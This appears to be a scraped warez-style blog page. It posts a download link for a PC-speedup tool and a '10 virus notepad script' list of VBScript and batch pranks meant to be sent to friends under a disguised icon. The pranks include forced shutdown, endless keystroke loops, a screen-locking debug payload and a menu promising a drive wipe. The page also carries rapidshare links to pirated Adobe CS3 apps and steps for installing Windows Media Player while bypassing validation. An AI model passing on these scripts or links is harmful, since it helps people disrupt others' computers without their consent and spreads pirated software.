eBoostr:Boost Your Windows with Flash Memory

PC Getting Slow

Give Your Windows PC a Boost!

eBoostr, working as an alternative solution to ReadyBoost and SuperFetch technologies, implements a different advanced approach to use flash memory to speed up your computer

It speeds up your PC and improves application responsiveness by using flash memory and free RAM as an extra layer of performance-boosting cache for your PC. Use up to four inexpensive flash devices to speed up your system. Add more speed to your PC without any hardware upgrade!

Highlights

  • Vista’s ReadyBoost and SuperFetch benefits on your Windows XP PCs;
  • Smart caching of frequently used applications and files for maximum performance;
  • Supports both USB and non-USB removable media devices (CF, SD/SDHC, MMC, xD and other memory cards), as well as additional hard disks;
  • Allows up to 4 devices for simultaneous smart caching;
  • Cache file size of up to 4GB on each device (NTFS has no limit on the size);
  • Compatible with all “Enhanced for ReadyBoost” devices.

System Requirements

  • Windows Vista, Windows XP, Windows 2000*, Windows 2003 Server, Windows 2008 Server, Windows 7 Beta
    (all 32 and 64 bit systems supported)
  • USB 2.0 port version or memory card reader
  • Flash drive or memory card with at least 2.5 MB/sec random read speed
  • Windows 2000 Service Pack 4 and Update Rollup 1 for sp4 are required

eBoostr Installation File

  • Version: 3.0 build 491
  • Filesize: 5.8MB with pactch
  • Release Date: January 28th, 2009
  • Available in 39 language
Download:
http://www.megaupload.com/?d=XZT8EUC9
Enjoy^^

10 virus notepad script


All this comand use to type in notepad

1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

2) Toggle your friend's Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3) Convey your friend a lil' message and shut down his / her computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

10) THRETEN BY MAKING SCREEN FLASH

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a

To disable error (ctrl+shirt+esc) then end process wscript.exe
Enjoy!!!^^

Make your pc talk!!!

make your pc talk
hellooo!

Open a text file in notepad and write:

Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text when u open the file, input the text and press ok."

u will hear what u typed

this works in xp,may be in vista also.

enjoy!!!^^

14 Adobe Portable Applications!!

Applications:

Adobe.Photoshop.CS3.v10.0.Extended (58,10 MB)
Adobe.Illustrator.CS3 (81,70 MB)
Adobe.Audition (42,78 MB)
ADOBE.INDESIGN.CS3 (95MB y 24,67 MB)
ADOBE.CONTRIBUTE.CS3 (24,72 MB)
Adobe Pagemaker (30,62 MB)
Adobe Photoshop Lightroom (20,73 MB)
Adobe Encore CS3 (48,16 MB)
Adobe Fireworks (48,30 MB)
Adobe After Effects (95MB y 9MB)
Adobe LiveCycle Designer 8.0 (61,03 MB)
Adobe Premiere Pro CS3 (63,70 MB)
Adobe Soundbooth CS3 (53,91 MB)
Adobe Flash CS3(99 MB)

Adobe.Photoshop.CS3.v10.0.Extended
Applications:
Adobe Photoshop CS3
- Adobe ExtendScript Toolkit CS3
- Adobe Bridge CS3
- Adobe Device Central CS3
- Adobe Stock Photos CS3
http://rapidshare.com/files/129599612/Adobe_Photoshop_PS3_Portable_mNy90.rar

Adobe.Illustrator.CS3
Efficiently create sophisticated vector artwork for virtually any medium
* Explore and apply color variations using dynamic new color controls
* Be more productive with new and enhanced features to get your artwork going
* Streamline your design workflows by moving easily between Illustrator CS3 and other Adobe applications
* Enhance your artwork with professional typography and transparent effects

http://rapidshare.com/files/129732782/Portable_Adobe_Illustrator_CS3_mNy90.rar

ADOBE.INDESIGN.CS3
* Design professional page layouts using rich creative options
* Boost efficiency through productivity enhancements and tight integration
* Automate workflows and processes, including long-document publishing
* Flexible XML import and export controls and robust scripting support
* Design compelling page layouts that include transparency, creative effects, and gradient feathers.

http://rapidshare.com/files/129720950/Portable_Adobe_InDesign_CS3_mNy90.part1.rar

http://rapidshare.com/files/129532938/Portable_Adobe_InDesign_CS3_mNy90.part2.rar

Adobe Audition (with MANUAL)
* All-in-one solution for audio recording, mixing, editing, and mastering
* Powerful, flexible, low-latency mixing engine with VSTi support for real-time recording and editing
* Complete audio mastering and restoration toolset for unprecedented flexibility and control
* Edit audio more effectively with enhanced editing tools, and work faster with improved multicore support and enhanced efficiency in the mixing engine
* Work with more than 50 digital signal processing (DSP) tools and effects, mastering and analysis tools, and audio restoration features.

http://rapidshare.com/files/129738442/Portable_Adobe_Audition_2.0_mNy90.rar

Maual:http://rapidshare.com/files/129592824/Adobe.Audition.v3.0.Manual.Addon.Multilingual_mNy90.rar

ADOBE.CONTRIBUTE.CS3

* Update multiple websites and blogs from a single application
* Maintain website integrity and look and feel through integration with Dreamweaver templates
* Control website authoring permissions with site administration and connection management consoles
* Post and publish content from within !! MS Software is not allowed !! Office applications
* Now compatible with Windows Vista and Intel based Macs.

http://rapidshare.com/files/129635089/Portable_Adobe_Contribute_CS3_mNy90.rar


Adobe Pagemaker
* Adobe PageMaker 7.0 helps users create an impressive variety of printed publications. Professional-quality tools and multiple options ensure that your business or personal printing looks sharp, reads well and gets attention!
* Familiar Adobe menus, palettes, and keyboard shortcuts to cut down your design time and help you work more efficiently
* Lay out complete publications in just a few clicks -- design frame to hold text & graphics, apply master pages and work with layers to set up multiple versions of publications
* Edit your work easily with the built-in story editor
* Thousands of great templates for newsletters, brochures, reports, business stationery, and other publications.

http://rapidshare.com/files/129514497/Portable_Adobe_PageMaker_7.01_mNy90.rar


Adobe Encore CS3
http://rapidshare.com/files/129561421/Adobe_Encore_CS3_mNy90.rar

Adobe Fireworks

Top features
Vector and bitmap editing
Create and edit vector and bitmap images, and import and edit native Adobe® Photoshop® and Adobe Illustrator® files.

Image optimization
Optimize graphics for virtually any delivery scenario with preview, cross-platform gamma preview, selective JPEG compression, and a wide range of export controls.


Photoshop and Illustrator integration
Efficient Photoshop and Illustrator integration
Import Photoshop (PSD) files while retaining hierarchical layers, layer effects, and blend modes. Save Adobe Fireworks® (PNG) files back into Photoshop (PSD) format. Import Illustrator (AI) files while retaining graphic integrity, including layer, group, and color information.

http://rapidshare.com/files/129566073/Adobe_Fireworks_CS3_mNy90.rar

Adobe LiveCycle Designer 8.0
Adobe LiveCycle Designer is a forms authoring tool published by Adobe Systems. The purpose of Designer is to be a one-stop design tool for XML forms to be rendered as PDF or HTML files.
Features
Designer forms are structured documents with a hierarchical structure that can be converted into XML. This structure can include structure from XML Schema and example XML files.

http://rapidshare.com/files/129572316/Adobe_LiveCycle_Designer_8.0_mNy90.rar

Adobe Premiere Pro CS3
Capture, edit, and deliver video to disc, the web, and mobile devices
Make every phase of video production more efficient with Adobe® Premiere® Pro CS3 software, which includes Adobe OnLocation™ CS3* (Windows® only) and Adobe Encore® CS3.

Learn about Adobe's plans for Creative Suite 3 on Mac OS X Leopard. (PDF, 105k)
Native support for Sony XDCAM and Panasonic P2 formats
Output to DVD and Blu-ray Disc
High-quality slow motion with time remapping
Direct-to-disk recording and professional on-set monitoring
Publish Adobe Encore projects to the web
Multiple project panels with smart file search
Improved editing efficiency
Output for mobile devices

http://rapidshare.com/files/129581891/Adobe_Premiere_Pro_CS3_mNy90.rar

Adobe Soundbooth CS3
Description:
Adobe Soundbooth CS3 software lets you take command of your audio in film, video, and Adobe Flash software projects. Use on-clip controls to make fast edits and intuitive, task-based tools to clean up recordings, polish voice-overs, customize music, modify sound effects, apply high-quality filters, and much more. Tight integration with Flash CS3 Professional and Adobe Premiere Pro CS3 software and an intuitive, visual interface mean you can get the job done quickly without sacrificing creative control.

http://rapidshare.com/files/129588081/Adobe_Soundbooth_CS3_mNy90.rar

Adobe Photoshop Lightroom
Perform nondestructive editing
Enjoy robust support for more than 150 camera raw formats, and experiment with confidence. Adjustments you make to images in Lightroom won't alter the original data, whether you're working on a JPEG, TIFF, DNG, or camera raw file.

Enjoy an elegant, uncluttered interface
Ease the learning curve and be productive quickly. Task-oriented modules whisk you through typical workflow tasks by putting just the tools you need at your fingertips.

Professional editing tools
Fine-tune your photographs with precise, easy-to-use tools for globally correcting white balance, exposure, tone curves, lens distortion, and color casts.

http://rapidshare.com/files/129574579/Adobe_Photoshop_Lightroom_mNy90.rar

Adobe After Effects CS3
Create motion graphics and visual effects with the industry standard
Adobe® After Effects® CS3 Professional software is an essential upgrade. Design vector graphics, create more organic movements, and expedite delivery with new integration and collaboration features.

Learn about Adobe's plans for Creative Suite 3 on Mac OS X Leopard. (PDF, 105k)
Reasons to upgrade
Shape Layers
Puppet tool
Adobe Photoshop® CS3 Extended integration
Adobe Flash® CS3 Professional integration
Per-character 3D text animation
Brainstorm
Complete color management workflow
Adobe Clip Notes
Enhanced performance
Video for mobile

http://rapidshare.com/files/129552784/Adobe_After_Effects_CS3_mNy90.part1.rar
http://rapidshare.com/files/129553702/Adobe_After_Effects_CS3_mNy90.part2.rar

Adobe Flash CS3
CREATE AND DELIVER INTERACTIVE CONTENT
Enjoy a fast, fluid workflow with Adobe® Flash® CS3 Professional software, featuring a streamlined user interface, advanced video tools, and impressive integration with related software.

Reasons to upgrade
* Animation conversion to ActionScript?
* Adobe interface
* ActionScript 3.0 development
* Advanced debugger
* Adobe Device Central CS3
* Rich drawing capabilities
* User interface components
* Advanced QuickTime export
* Sophisticated video tools
* Timesaving coding tools

http://www.megaupload.com/?d=H0AYUIDI



Crack Windows Media Player 11 Final Bypassing WGA Validation

Here are the tutorial to install Window Media Player without validate:

Step 1:Download Windows Media Player 11 from here:
Download wmp11-windowsxp-x86-enu.exe

Step 2:
Extract the contents of wmp11-windowsxp-x86-enu.exe. You can do it with winrar

a.Now we have our contents extracted to the wmp11-windowsxp-x86-enu folder.
Step 3:
Open the extracted folder. Run the wmfdist11.exe file.
Step 4:
After run wmfdist11.exe file,then run the next file wmp11.exe.
Step 5:
Restart the computer.

Done.Enjoy your Window Media Player 11

Official Free Search Engine Submission